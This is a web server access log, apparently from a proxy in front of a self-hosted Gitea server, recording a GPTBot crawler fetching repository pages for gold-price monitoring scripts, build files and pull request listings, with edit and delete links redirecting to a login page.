git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/user_assets.csv?display=source" [Client 74.7.227.38] [Length 11404] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/user_assets.csv" +[17/Feb/2026:17:27:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17364] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:27:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libiconv-2.dll?display=rendered" [Client 74.7.227.38] [Length 10828] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libiconv-2.dll" +[17/Feb/2026:17:27:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/Old_GoldMonitor.py?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/Old_GoldMonitor.py" +[17/Feb/2026:17:27:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_KRX.py?display=rendered" [Client 74.7.227.38] [Length 10924] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_KRX.py" +[17/Feb/2026:17:27:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.0.py?display=rendered" [Client 74.7.227.38] [Length 10899] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.0.py" +[17/Feb/2026:17:27:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1.py?display=rendered" [Client 74.7.227.38] [Length 10929] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1.py" +[17/Feb/2026:17:27:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/.python-version?display=rendered" [Client 74.7.227.38] [Length 10921] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/.python-version" +[17/Feb/2026:17:27:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.0.py?display=rendered" [Client 74.7.227.38] [Length 10930] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.0.py" +[17/Feb/2026:17:27:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/ReadMe.md?display=source" [Client 74.7.227.38] [Length 12528] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/ReadMe.md" +[17/Feb/2026:17:27:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.py?display=rendered" [Client 74.7.227.38] [Length 10925] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.py" +[17/Feb/2026:17:27:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build_exe.py?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build_exe.py" +[17/Feb/2026:17:27:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_price_log.csv?display=rendered" [Client 74.7.227.38] [Length 10990] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_price_log.csv" +[17/Feb/2026:17:27:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.py?display=source" [Client 74.7.227.38] [Length 19912] [Gzip 6.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.py" +[17/Feb/2026:17:27:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.ico?display=rendered" [Client 74.7.227.38] [Length 10777] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.ico" +[17/Feb/2026:17:27:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.py?display=source" [Client 74.7.227.38] [Length 21335] [Gzip 7.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.py" +[17/Feb/2026:17:27:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17364] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:27:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10873] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/my_database.db" +[17/Feb/2026:17:27:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17369] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:27:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/.python-version?display=source" [Client 74.7.227.38] [Length 10985] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/.python-version" +[17/Feb/2026:17:27:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.log?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.log" +[17/Feb/2026:17:27:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_price_log.csv?display=rendered" [Client 74.7.227.38] [Length 11022] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_price_log.csv" +[17/Feb/2026:17:27:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py.old?display=source" [Client 74.7.227.38] [Length 16611] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:17:27:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/user_assets.csv?display=source" [Client 74.7.227.38] [Length 11377] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/user_assets.csv" +[17/Feb/2026:17:27:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/nos_setup.exe?display=rendered" [Client 74.7.227.38] [Length 10849] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/nos_setup.exe" +[17/Feb/2026:17:27:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.log?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.log" +[17/Feb/2026:17:27:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.py?display=rendered" [Client 74.7.227.38] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.py" +[17/Feb/2026:17:27:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 11290] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" +[17/Feb/2026:17:27:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33696] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:27:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33389] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:17:27:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11138] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:27:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33683] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:27:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:17:27:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11144] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:27:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33685] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:27:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:27:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:27:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11012] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:27:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:17:27:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:17:27:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:17:27:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:17:27:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 9840] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:17:27:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:17:27:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 963] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:17:27:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 10242] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:17:27:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:27:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:27:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 12489] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode" +[17/Feb/2026:17:27:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md?display=source" [Client 74.7.227.38] [Length 21147] [Gzip 6.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:17:27:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 